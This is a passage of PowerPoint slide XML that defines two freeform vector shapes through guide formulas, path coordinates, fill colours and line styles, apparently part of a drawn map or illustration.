                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="176"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36439" name="Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2953" y="2563"/>
                <a:ext cx="166" cy="262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 166"/>
                  <a:gd name="T1" fmla="*/ 169 h 262"/>
                  <a:gd name="T2" fmla="*/ 1 w 166"/>
                  <a:gd name="T3" fmla="*/ 162 h 262"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 155 h 262"/>
                  <a:gd name="T6" fmla="*/ 4 w 166"/>
                  <a:gd name="T7" fmla="*/ 144 h 262"/>
                  <a:gd name="T8" fmla="*/ 15 w 166"/>
                  <a:gd name="T9" fmla="*/ 129 h 262"/>
                  <a:gd name="T10" fmla="*/ 32 w 166"/>
                  <a:gd name="T11" fmla="*/ 106 h 262"/>
                  <a:gd name="T12" fmla="*/ 33 w 166"/>
                  <a:gd name="T13" fmla="*/ 90 h 262"/>
                  <a:gd name="T14" fmla="*/ 33 w 166"/>
                  <a:gd name="T15" fmla="*/ 80 h 262"/>
                  <a:gd name="T16" fmla="*/ 35 w 166"/>
                  <a:gd name="T17" fmla="*/ 65 h 262"/>
                  <a:gd name="T18" fmla="*/ 39 w 166"/>
                  <a:gd name="T19" fmla="*/ 52 h 262"/>
                  <a:gd name="T20" fmla="*/ 30 w 166"/>
                  <a:gd name="T21" fmla="*/ 41 h 262"/>
                  <a:gd name="T22" fmla="*/ 26 w 166"/>
                  <a:gd name="T23" fmla="*/ 23 h 262"/>
                  <a:gd name="T24" fmla="*/ 37 w 166"/>
                  <a:gd name="T25" fmla="*/ 0 h 262"/>
                  <a:gd name="T26" fmla="*/ 77 w 166"/>
                  <a:gd name="T27" fmla="*/ 19 h 262"/>
                  <a:gd name="T28" fmla="*/ 152 w 166"/>
                  <a:gd name="T29" fmla="*/ 59 h 262"/>
                  <a:gd name="T30" fmla="*/ 166 w 166"/>
                  <a:gd name="T31" fmla="*/ 74 h 262"/>
                  <a:gd name="T32" fmla="*/ 166 w 166"/>
                  <a:gd name="T33" fmla="*/ 86 h 262"/>
                  <a:gd name="T34" fmla="*/ 166 w 166"/>
                  <a:gd name="T35" fmla="*/ 110 h 262"/>
                  <a:gd name="T36" fmla="*/ 166 w 166"/>
                  <a:gd name="T37" fmla="*/ 127 h 262"/>
                  <a:gd name="T38" fmla="*/ 160 w 166"/>
                  <a:gd name="T39" fmla="*/ 129 h 262"/>
                  <a:gd name="T40" fmla="*/ 150 w 166"/>
                  <a:gd name="T41" fmla="*/ 130 h 262"/>
                  <a:gd name="T42" fmla="*/ 143 w 166"/>
                  <a:gd name="T43" fmla="*/ 145 h 262"/>
                  <a:gd name="T44" fmla="*/ 143 w 166"/>
                  <a:gd name="T45" fmla="*/ 154 h 262"/>
                  <a:gd name="T46" fmla="*/ 136 w 166"/>
                  <a:gd name="T47" fmla="*/ 158 h 262"/>
                  <a:gd name="T48" fmla="*/ 138 w 166"/>
                  <a:gd name="T49" fmla="*/ 165 h 262"/>
                  <a:gd name="T50" fmla="*/ 134 w 166"/>
                  <a:gd name="T51" fmla="*/ 172 h 262"/>
                  <a:gd name="T52" fmla="*/ 133 w 166"/>
                  <a:gd name="T53" fmla="*/ 179 h 262"/>
                  <a:gd name="T54" fmla="*/ 139 w 166"/>
                  <a:gd name="T55" fmla="*/ 178 h 262"/>
                  <a:gd name="T56" fmla="*/ 142 w 166"/>
                  <a:gd name="T57" fmla="*/ 189 h 262"/>
                  <a:gd name="T58" fmla="*/ 144 w 166"/>
                  <a:gd name="T59" fmla="*/ 195 h 262"/>
                  <a:gd name="T60" fmla="*/ 149 w 166"/>
                  <a:gd name="T61" fmla="*/ 201 h 262"/>
                  <a:gd name="T62" fmla="*/ 148 w 166"/>
                  <a:gd name="T63" fmla="*/ 207 h 262"/>
                  <a:gd name="T64" fmla="*/ 142 w 166"/>
                  <a:gd name="T65" fmla="*/ 205 h 262"/>
                  <a:gd name="T66" fmla="*/ 133 w 166"/>
                  <a:gd name="T67" fmla="*/ 210 h 262"/>
                  <a:gd name="T68" fmla="*/ 129 w 166"/>
                  <a:gd name="T69" fmla="*/ 215 h 262"/>
                  <a:gd name="T70" fmla="*/ 128 w 166"/>
                  <a:gd name="T71" fmla="*/ 220 h 262"/>
                  <a:gd name="T72" fmla="*/ 106 w 166"/>
                  <a:gd name="T73" fmla="*/ 237 h 262"/>
                  <a:gd name="T74" fmla="*/ 87 w 166"/>
                  <a:gd name="T75" fmla="*/ 238 h 262"/>
                  <a:gd name="T76" fmla="*/ 85 w 166"/>
                  <a:gd name="T77" fmla="*/ 245 h 262"/>
                  <a:gd name="T78" fmla="*/ 78 w 166"/>
                  <a:gd name="T79" fmla="*/ 254 h 262"/>
                  <a:gd name="T80" fmla="*/ 69 w 166"/>
                  <a:gd name="T81" fmla="*/ 255 h 262"/>
                  <a:gd name="T82" fmla="*/ 58 w 166"/>
                  <a:gd name="T83" fmla="*/ 259 h 262"/>
                  <a:gd name="T84" fmla="*/ 53 w 166"/>
                  <a:gd name="T85" fmla="*/ 261 h 262"/>
                  <a:gd name="T86" fmla="*/ 48 w 166"/>
                  <a:gd name="T87" fmla="*/ 256 h 262"/>
                  <a:gd name="T88" fmla="*/ 35 w 166"/>
                  <a:gd name="T89" fmla="*/ 262 h 262"/>
                  <a:gd name="T90" fmla="*/ 33 w 166"/>
                  <a:gd name="T91" fmla="*/ 261 h 262"/>
                  <a:gd name="T92" fmla="*/ 29 w 166"/>
                  <a:gd name="T93" fmla="*/ 253 h 262"/>
                  <a:gd name="T94" fmla="*/ 15 w 166"/>
                  <a:gd name="T95" fmla="*/ 236 h 262"/>
                  <a:gd name="T96" fmla="*/ 9 w 166"/>
                  <a:gd name="T97" fmla="*/ 225 h 262"/>
                  <a:gd name="T98" fmla="*/ 13 w 166"/>
                  <a:gd name="T99" fmla="*/ 222 h 262"/>
                  <a:gd name="T100" fmla="*/ 25 w 166"/>
                  <a:gd name="T101" fmla="*/ 224 h 262"/>
                  <a:gd name="T102" fmla="*/ 31 w 166"/>
                  <a:gd name="T103" fmla="*/ 222 h 262"/>
                  <a:gd name="T104" fmla="*/ 29 w 166"/>
                  <a:gd name="T105" fmla="*/ 220 h 262"/>
                  <a:gd name="T106" fmla="*/ 25 w 166"/>
                  <a:gd name="T107" fmla="*/ 211 h 262"/>
                  <a:gd name="T108" fmla="*/ 25 w 166"/>
                  <a:gd name="T109" fmla="*/ 198 h 262"/>
                  <a:gd name="T110" fmla="*/ 21 w 166"/>
                  <a:gd name="T111" fmla="*/ 182 h 262"/>
                  <a:gd name="T112" fmla="*/ 13 w 166"/>
                  <a:gd name="T113" fmla="*/ 173 h 26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66"/>
                  <a:gd name="T172" fmla="*/ 0 h 262"/>
                  <a:gd name="T173" fmla="*/ 166 w 166"/>
                  <a:gd name="T174" fmla="*/ 262 h 262"/>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66" h="262">
                    <a:moveTo>
                      <a:pt x="9" y="172"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="172"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36440" name="Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2953" y="2563"/>
                <a:ext cx="166" cy="262"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 166"/>
                  <a:gd name="T1" fmla="*/ 169 h 262"/>
                  <a:gd name="T2" fmla="*/ 1 w 166"/>
                  <a:gd name="T3" fmla="*/ 162 h 262"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 155 h 262"/>
                  <a:gd name="T6" fmla="*/ 4 w 166"/>
                  <a:gd name="T7" fmla="*/ 144 h 262"/>
                  <a:gd name="T8" fmla="*/ 15 w 166"/>
                  <a:gd name="T9" fmla="*/ 129 h 262"/>
                  <a:gd name="T10" fmla="*/ 32 w 166"/>
                  <a:gd name="T11" fmla="*/ 106 h 262"/>
                  <a:gd name="T12" fmla="*/ 33 w 166"/>
                  <a:gd name="T13" fmla="*/ 90 h 262"/>
                  <a:gd name="T14" fmla="*/ 33 w 166"/>
                  <a:gd name="T15" fmla="*/ 80 h 262"/>
                  <a:gd name="T16" fmla="*/ 35 w 166"/>
                  <a:gd name="T17" fmla="*/ 65 h 262"/>
                  <a:gd name="T18" fmla="*/ 39 w 166"/>
                  <a:gd name="T19" fmla="*/ 52 h 262"/>
                  <a:gd name="T20" fmla="*/ 30 w 166"/>
                  <a:gd name="T21" fmla="*/ 41 h 262"/>
                  <a:gd name="T22" fmla="*/ 26 w 166"/>
                  <a:gd name="T23" fmla="*/ 23 h 262"/>
                  <a:gd name="T24" fmla="*/ 37 w 166"/>
                  <a:gd name="T25" fmla="*/ 0 h 262"/>
                  <a:gd name="T26" fmla="*/ 77 w 166"/>
                  <a:gd name="T27" fmla="*/ 19 h 262"/>
                  <a:gd name="T28" fmla="*/ 152 w 166"/>
                  <a:gd name="T29" fmla="*/ 59 h 262"/>
                  <a:gd name="T30" fmla="*/ 166 w 166"/>
                  <a:gd name="T31" fmla="*/ 74 h 262"/>
                  <a:gd name="T32" fmla="*/ 166 w 166"/>
                  <a:gd name="T33" fmla="*/ 86 h 262"/>
                  <a:gd name="T34" fmla="*/ 166 w 166"/>
                  <a:gd name="T35" fmla="*/ 110 h 262"/>
                  <a:gd name="T36" fmla="*/ 166 w 166"/>
                  <a:gd name="T37" fmla="*/ 127 h 262"/>
                  <a:gd name="T38" fmla="*/ 160 w 166"/>
                  <a:gd name="T39" fmla="*/ 129 h 262"/>
                  <a:gd name="T40" fmla="*/ 150 w 166"/>
                  <a:gd name="T41" fmla="*/ 130 h 262"/>
                  <a:gd name="T42" fmla="*/ 143 w 166"/>
                  <a:gd name="T43" fmla="*/ 145 h 262"/>
                  <a:gd name="T44" fmla="*/ 143 w 166"/>
                  <a:gd name="T45" fmla="*/ 154 h 262"/>
                  <a:gd name="T46" fmla="*/ 136 w 166"/>
                  <a:gd name="T47" fmla="*/ 158 h 262"/>
                  <a:gd name="T48" fmla="*/ 138 w 166"/>
                  <a:gd name="T49" fmla="*/ 165 h 262"/>
                  <a:gd name="T50" fmla="*/ 134 w 166"/>
                  <a:gd name="T51" fmla="*/ 172 h 262"/>
                  <a:gd name="T52" fmla="*/ 133 w 166"/>
                  <a:gd name="T53" fmla="*/ 179 h 262"/>
                  <a:gd name="T54" fmla="*/ 139 w 166"/>
                  <a:gd name="T55" fmla="*/ 178 h 262"/>
                  <a:gd name="T56" fmla="*/ 142 w 166"/>
                  <a:gd name="T57" fmla="*/ 189 h 262"/>
                  <a:gd name="T58" fmla="*/ 144 w 166"/>
                  <a:gd name="T59" fmla="*/ 195 h 262"/>
                  <a:gd name="T60" fmla="*/ 149 w 166"/>
                  <a:gd name="T61" fmla="*/ 201 h 262"/>
                  <a:gd name="T62" fmla="*/ 148 w 166"/>
                  <a:gd name="T63" fmla="*/ 207 h 262"/>
                  <a:gd name="T64" fmla="*/ 142 w 166"/>
                  <a:gd name="T65" fmla="*/ 205 h 262"/>
                  <a:gd name="T66" fmla="*/ 133 w 166"/>
                  <a:gd name="T67" fmla="*/ 210 h 262"/>
                  <a:gd name="T68" fmla="*/ 129 w 166"/>
                  <a:gd name="T69" fmla="*/ 215 h 262"/>
                  <a:gd name="T70" fmla="*/ 128 w 166"/>
                  <a:gd name="T71" fmla="*/ 220 h 262"/>
                  <a:gd name="T72" fmla="*/ 106 w 166"/>
                  <a:gd name="T73" fmla="*/ 237 h 262"/>
                  <a:gd name="T74" fmla="*/ 87 w 166"/>
                  <a:gd name="T75" fmla="*/ 238 h 262"/>
                  <a:gd name="T76" fmla="*/ 85 w 166"/>
                  <a:gd name="T77" fmla="*/ 245 h 262"/>
                  <a:gd name="T78" fmla="*/ 78 w 166"/>
                  <a:gd name="T79" fmla="*/ 254 h 262"/>
                  <a:gd name="T80" fmla="*/ 69 w 166"/>
                  <a:gd name="T81" fmla="*/ 255 h 262"/>
                  <a:gd name="T82" fmla="*/ 58 w 166"/>
                  <a:gd name="T83" fmla="*/ 259 h 262"/>
                  <a:gd name="T84" fmla="*/ 53 w 166"/>
                  <a:gd name="T85" fmla="*/ 261 h 262"/>
                  <a:gd name="T86" fmla="*/ 48 w 166"/>
                  <a:gd name="T87" fmla="*/ 256 h 262"/>
                  <a:gd name="T88" fmla="*/ 35 w 166"/>
                  <a:gd name="T89" fmla="*/ 262 h 262"/>
                  <a:gd name="T90" fmla="*/ 33 w 166"/>
                  <a:gd name="T91" fmla="*/ 261 h 262"/>
                  <a:gd name="T92" fmla="*/ 29 w 166"/>
                  <a:gd name="T93" fmla="*/ 253 h 262"/>
                  <a:gd name="T94" fmla="*/ 15 w 166"/>
                  <a:gd name="T95" fmla="*/ 236 h 262"/>
                  <a:gd name="T96" fmla="*/ 9 w 166"/>
                  <a:gd name="T97" fmla="*/ 225 h 262"/>
                  <a:gd name="T98" fmla="*/ 13 w 166"/>
                  <a:gd name="T99" fmla="*/ 222 h 262"/>
                  <a:gd name="T100" fmla="*/ 25 w 166"/>
                  <a:gd name="T101" fmla="*/ 224 h 262"/>
                  <a:gd name="T102" fmla="*/ 31 w 166"/>
                  <a:gd name="T103" fmla="*/ 222 h 262"/>
                  <a:gd name="T104" fmla="*/ 29 w 166"/>
                  <a:gd name="T105" fmla="*/ 220 h 262"/>
                  <a:gd name="T106" fmla="*/ 25 w 166"/>
                  <a:gd name="T107" fmla="*/ 211 h 262"/>
                  <a:gd name="T108" fmla="*/ 25 w 166"/>
                  <a:gd name="T109" fmla="*/ 198 h 262"/>
                  <a:gd name="T110" fmla="*/ 21 w 166"/>
                  <a:gd name="T111" fmla="*/ 182 h 262"/>
                  <a:gd name="T112" fmla="*/ 13 w 166"/>
                  <a:gd name="T113" fmla="*/ 173 h 26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66"/>
                  <a:gd name="T172" fmla="*/ 0 h 262"/>
                  <a:gd name="T173" fmla="*/ 166 w 166"/>
                  <a:gd name="T174" fmla="*/ 262 h 262"/>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66" h="262">
                    <a:moveTo>
                      <a:pt x="9" y="172"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
